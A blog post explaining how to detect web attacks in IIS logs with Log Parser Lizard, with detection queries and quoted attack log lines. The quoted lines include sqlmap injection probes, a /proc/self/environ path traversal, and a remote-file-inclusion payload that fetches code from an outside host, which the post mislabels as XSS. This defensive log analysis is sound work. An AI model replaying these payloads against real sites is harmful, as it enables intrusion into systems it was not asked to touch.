Monday, January 12, 2015

How to use Log Parser Lizard




A Log Parser GUI for Microsoft Log Parser http://www.lizard-labs.com/log_parser_lizard.aspx is a versatile tool that provides quick access to log files, XML files, CSV files, as well as data sources on the Microsoft Windows operating system. Now, businesses running Log Parser can use this query software to find exactly what they need exactly when they need it.




1)      Click on “IIS logs” button
2)      Click on “Attacks” link
3)      Modify line “3” with your path to your logs location. Keep format and do not forget to type \*.log’ in end of line.
4)      Click “Run Query” button

Predefined Queries


The following are a set of queries and their purpose we use to analyse the logs:

Main Query used for most Attacks:


This query covered following attacks: Directory discovery, XSS, XSF, SQL injection, Command injection. Part with PHP -  all attacks related to PHP technology. We monitoring these attacks, because hackers can develop new attack if they see that technology is different.

SELECT date AS Date, c-ip AS IP,cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,
count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'

Where (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')
OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')
OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')

GROUP BY date, c-ip, cs-uri-stem, cs-uri-query ORDER BY date, c-ip, cs-uri-query

SQL Injection Attempts:

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Broser, count(*) AS Attempts FROM 'C:\IIS Logs\Logs\*.log' Where cs(User-Agent) LIKE '%sql%' GROUP BY date, c-ip, cs-uri-query, cs(User-Agent) ORDER BY date, c-ip, cs-uri-query

Query details:

·         (cs-uri-query LIKE '%./%') – Searching “./” pattern “%” means “ Any Symbol” – Directory discovering.
·         (cs-uri-query LIKE '%.php%') – Searching any record contain “***.php” – An any PHP related attacks.
·         (cs-uri-query LIKE '%//.%') - Searching “.//” pattern – Directory discovering.
·         (cs-uri-query LIKE '%src=http%') – XSS scripting.
·         (cs-uri-query LIKE '%src=ftp%') - XSS scripting
·         (cs-uri-query LIKE '%l=ftp://%') - XSS scripting
·         (cs-uri-query LIKE '%l=http://%') - XSS scripting
·         (cs-uri-query LIKE '%SELECT%') – SQL injection





1)      Click “Export to Excel”
2)      Chose location.
3)      Click “Save”.

After that you can perform log analyses and report.

WW3 Logs Analyses




When you looking into logs there is pattern of normal work. You can easily will find pattern if you just start going through logs. On some server patterns looks like this.

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234
2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124
2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46
2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060
2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608
2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78
2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46
2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31
2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

This normal work contain Date, Time, IP of server, details of request, IP of remote host and details of application, OS which been used. 
When we scrolling logs down, we can see different types of attacks.

Sample of SQL injection attack

Performed to verify security of web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let’s make short analyses of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15


-          First RED part is injection attempt, 2nd RED part is IP address. 3D Part is details of tool.
First part is always present and this major information that SQL Injection been done.
-          2nd part is IP address. We copy this IP Address and checking where is location - http://www.iplocation.net/.
Location can help to understand if it is not internal test or VA. If location different than YOUR network, than we should start investigation if this attack penetrate our web site.
-          For investigation we using special computers with installed BackTrack distributive and with SQLMAP we trying to repeat SQL injection to see if our application or network is vulnerable to such attack.


Keep in mind that this is just sample of our attack and that some of attacks can looks different.

Provide information about other attacks and what look, difference from pattern, IP Location.

One of sample of Event logs from App logs  shows that it was some potential attack :

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

You can see that Exception message shows “ Potential Danger Request…”, we can google.com it and see that it can be related to security of windows form on .NET . But we must be sure that it is not repetitive attempt penetrate web site. Unfortunately without sniffer we cannot see whole URL ( href=”http://qual... “”), therefore we need to perform cross search in other logs for same time. In this situation simple Google search shows that this IP address been reported as Spam Bot, which trying to submit messages in forms. As our web site have form, therefore Spam Bot automatically trying to submit some post there.

Sample of CSS ( Cross Site Scripting) or XSS


2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105


SQL Injection:

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483
2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499

Possibly directory enumeration attack:

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78




Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)